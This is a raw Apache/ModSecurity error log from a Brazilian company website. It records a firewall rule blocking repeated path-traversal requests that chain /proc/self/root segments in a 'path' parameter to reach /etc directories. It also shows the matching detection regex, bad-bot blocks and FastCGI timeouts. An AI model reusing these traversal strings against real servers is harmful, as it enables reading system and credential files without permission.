[Wed Mar 18 16:21:35.483264 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:51592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr7P9a6ubjKNq_cu4bXggAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:21:38.128610 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:46794] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:21:39.647141 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.241.31:34460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr7QwbLMZ6AikZjR9X6ewAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:22:05.121797 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47786] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:22:18.645495 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:49644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr7auoXxyEfFpUF8f-wRAAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:22:29.153809 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48686] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:22:53.145995 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49552] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:23:18.102897 2026] [proxy_fcgi:error] [pid 11816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50584] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:23:43.133768 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51544] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:24:05.836459 2026] [:error] [pid 23798:tid 140411716749056] [client 74.7.241.31:38650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr71T-9rzzdA3Ti0NCLFgAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:24:09.817786 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52650] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:24:34.045938 2026] [proxy_fcgi:error] [pid 9800:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53742] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:24:57.075456 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54792] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:25:14.419842 2026] [:error] [pid 9800:tid 140411540502272] [client 74.7.244.43:50168] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr8GoJpNEVVDhwB8vN_sAAAA5g"]
[Wed Mar 18 16:25:19.356036 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55562] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:25:20.168237 2026] [:error] [pid 9333:tid 140411691570944] [client 74.7.228.61:54016] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr8IA_eYRmh974Uj6T-0wAAAoY"]
[Wed Mar 18 16:25:41.561826 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56168] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:25:51.506913 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.241.31:44818] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr8PymAPhZkrhU8w4mkhQAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:26:03.288862 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56854] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:26:25.569860 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57446] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:26:35.535189 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.243.128:51244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr8axkFeYa1D6dYQnCINQAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:26:47.374099 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58022] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:27:09.605805 2026] [proxy_fcgi:error] [pid 9800:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58676] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:27:31.173803 2026] [proxy_fcgi:error] [pid 9530:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59368] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:27:52.343353 2026] [proxy_fcgi:error] [pid 9333:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59890] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:28:06.461701 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.243.128:42740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr8xew_le52K8_3pV0WlwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:28:15.489773 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60626] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:28:38.433806 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33320] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:29:01.365590 2026] [proxy_fcgi:error] [pid 9333:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34206] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:29:24.152687 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34892] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:29:46.053942 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35198] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:30:06.257847 2026] [:error] [pid 9530:tid 140411574073088] [client 74.7.241.31:57364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr9PgSuyh5UNeevTVffXwAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:30:09.437830 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35540] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:30:16.032707 2026] [:error] [pid 9530:tid 140411582465792] [client 74.7.228.61:36232] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr9SASuyh5UNeevTVffYQAAAxM"]
[Wed Mar 18 16:30:16.236481 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.244.43:41838] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr9SOyqAr6etmhZHNoEoQAAAFM"]
[Wed Mar 18 16:30:32.125809 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35942] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:30:55.075165 2026] [proxy_fcgi:error] [pid 9530:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36360] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:30:55.131852 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:46362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr9bwbLMZ6AikZjR9X7KgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:31:01.006055 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.241.31:57526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr9dSmAPhZkrhU8w4mk7gAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:31:20.133796 2026] [proxy_fcgi:error] [pid 9800:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36850] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:31:47.489791 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37488] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:31:52.351449 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.241.31:35510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr9qCmAPhZkrhU8w4mlBgAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:32:12.137781 2026] [proxy_fcgi:error] [pid 29882:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38128] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:32:39.125801 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38760] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:33:04.121176 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39432] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:33:25.527059 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.241.31:60038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr-BRkFeYa1D6dYQnCJSwAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:33:28.045823 2026] [proxy_fcgi:error] [pid 23798:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40188] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:33:48.856203 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.241.31:60038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr-HBkFeYa1D6dYQnCJVwAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:33:52.141781 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41026] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:34:21.053813 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42086] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:34:44.129910 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43094] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:34:57.737402 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:35160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr-YeoXxyEfFpUF8f-xGgAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:35:03.362857 2026] [mime_magic:error] [pid 23798:tid 140411565680384] (70014)End of file found: [client 57.141.18.9:48886] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:35:06.145821 2026] [proxy_fcgi:error] [pid 29882:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43920] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:35:19.356275 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.244.43:58970] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr-d0zinOy1jxa1j4dZAgAAARc"]
[Wed Mar 18 16:35:29.053807 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44798] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:35:30.532222 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.228.61:59530] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr-ggbLMZ6AikZjR9X7iAAAAA8"]
[Wed Mar 18 16:35:39.471254 2026] [mime_magic:error] [pid 17887:tid 140411708356352] (70014)End of file found: [client 57.141.18.36:49460] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
